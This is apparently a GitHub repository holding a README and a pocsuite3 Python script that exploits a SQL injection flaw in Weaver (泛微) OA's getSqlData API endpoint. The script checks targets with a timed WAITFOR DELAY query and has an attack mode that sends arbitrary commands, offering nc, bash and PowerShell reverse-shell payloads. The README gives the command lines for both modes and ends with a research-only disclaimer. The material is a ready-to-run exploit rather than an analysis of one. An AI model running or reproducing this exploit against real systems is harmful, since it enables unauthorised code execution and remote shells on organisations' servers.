├── README.md
└── weaverOA_sql_injection_POC_EXP.py


/README.md:
--------------------------------------------------------------------------------
 1 | # weaverOA_sql_RCE
 2 | ## 泛微OA某版本的SQL代码执行漏洞
 3 | ### 2022.04.20
 4 | 经过测试，该漏洞属于泛微OA msssql远程代码执行漏洞。
 5 | 测试如图：
 6 | ![1650428637(1)](https://user-images.githubusercontent.com/54984589/164150112-b8ef1ee8-ff9a-4509-b75f-c73f199a5be9.png)
 7 | 
 8 | POC:
 9 | PS:url结尾不能有[/],例如：http://127.0.0.1:8080，不能为http://127.0.0.1:8080/
10 | 
11 | Url ending cannot have [/], for example, http://127.0.0.1:8080, not for http://127.0.0.1:8080/
12 | 
13 | pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --verify
14 | 
15 | ![1648651245(1)](https://user-images.githubusercontent.com/54984589/160861695-53c75697-6b88-41fb-bcc7-c1a49c8e2dec.png)
16 | 
17 | EXP:pocsuite -r weaverOA_sql_injection_POC_EXP.py -u url --attack --command "[command]"
18 | 
19 | PS:url结尾不能有[/],例如：http://127.0.0.1:8080，不能为http://127.0.0.1:8080/
20 | 
21 | Url ending cannot have [/], for example, http://127.0.0.1:8080, not for http://127.0.0.1:8080/
22 | 
23 | ![1648651381(1)](https://user-images.githubusercontent.com/54984589/160862217-45fe5a02-d6ab-4731-adb1-8b20ebcf2130.png)
24 | # 免责声明
25 | ## 此工具仅用于学习、研究和自查。不应将其用于非法目的。使用本工具产生的一切风险与我无关！
26 | # Disclaimer
27 | ## This tool is for study, research, and self-examination only. It should not be used for illegal purposes. All risks arising from the use of this tool have nothing to do with me!
28 | 


--------------------------------------------------------------------------------
/weaverOA_sql_injection_POC_EXP.py:
--------------------------------------------------------------------------------
  1 | # !/usr/bin/env python
  2 | # -*- coding: UTF-8 -*-
  3 | import json
  4 | import time
  5 | import base64
  6 | from collections import OrderedDict
  7 | from urllib.parse import urlparse, urljoin
  8 | from urllib.parse import quote,unquote
  9 | 
 10 | from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, VUL_TYPE
 11 | from pocsuite3.lib.core.interpreter_option import OptDict
 12 | from pocsuite3.modules.listener import REVERSE_PAYLOAD
 13 | 
 14 | 
 15 | class weaverOA_sql_injection(POCBase):
 16 |     vulID = 'weaverOA_sql_injection'
 17 |     version = '1.0'
 18 |     author = ['Warin9_0']
 19 |     vulDate = '2022-03-29'
 20 |     createDate = '2022-03-29'
 21 |     updateDate = '2022-03-29'
 22 |     references = ['']
 23 |     name = 'weaverOA_sql_injection'
 24 |     appPowerLink = ''
 25 |     appName = '泛微OA'
 26 |     appVersion = """The unknown"""
 27 |     vulType = VUL_TYPE.CODE_EXECUTION
 28 |     desc = '''fanwei_sql_injection'''
 29 |     samples = ['']
 30 |     install_requires = ['']
 31 |     category = POC_CATEGORY.EXPLOITS.WEBAPP
 32 | 
 33 |     def _options(self):
 34 |         o = OrderedDict()
 35 |         payload = {
 36 |             "nc": REVERSE_PAYLOAD.NC,
 37 |             "bash": REVERSE_PAYLOAD.BASH,
 38 |             "powershell": REVERSE_PAYLOAD.POWERSHELL,
 39 |         }
 40 |         o["command"] = OptDict(selected="bash", default=payload)
 41 |         return o
 42 | 
 43 |     def _check(self, url, cmd=""):
 44 |         self.timeout = 5
 45 |         cmd = cmd or "WAITFOR DELAY '00:00:03'"
 46 |         path = "/Api/portal/elementEcodeAddon/getSqlData?sql={}".format(cmd)
 47 |         vul_url = urljoin(url, path)
 48 |         print("\033[1;31m\npayload:" + cmd + '\033[0m\n')
 49 |         parse = urlparse(vul_url)
 50 |         headers = {
 51 |                 "Host": "{}".format(parse.netloc),
 52 |                             }
 53 |         try:
 54 |             r = requests.get(vul_url, timeout=self.timeout, headers=headers, verify=False)
 55 |         except Exception:
 56 |             return False
 57 |         else:
 58 |             if '"api_status":true' in r.text and r.status_code == 200:
 59 |                 url = vul_url
 60 |                 try:
 61 |                     cmd_result = json.loads(r.text).get('data')
 62 |                     return url,cmd_result
 63 |                 except Exception:
 64 |                     cmd_result = r.text
 65 |                     return False
 66 | 
 67 |         return False
 68 | 
 69 |     def _verify(self):
 70 |         result = {}
 71 |         p = self._check(self.url)
 72 |         if p:
 73 |             result['VerifyInfo'] = {}
 74 |             result['VerifyInfo']['URL'] = p[0]
 75 |             result['VerifyInfo']['Command executed successfully'] = p[1]
 76 | 
 77 |         return self.parse_output(result)
 78 | 
 79 |     def _attack(self):
 80 |         result = {}
 81 |         command = self.get_option("command")
 82 |         p = self._check(self.url, cmd=command)
 83 |         if p:
 84 |             result['VerifyInfo'] = {}
 85 |             result['VerifyInfo']['URL'] = p[0]
 86 |             result['VerifyInfo']['Command executed successfully'] = p[1]
 87 | 
 88 |         return self.parse_output(result)
 89 | 
 90 |     def parse_output(self, result):
 91 |         output = Output(self)
 92 |         if result:
 93 |             output.success(result)
 94 |         else:
 95 |             output.fail('url is not vulnerable')
 96 |         return output
 97 | 
 98 | 
 99 | register_poc(weaverOA_sql_injection)
100 | 


--------------------------------------------------------------------------------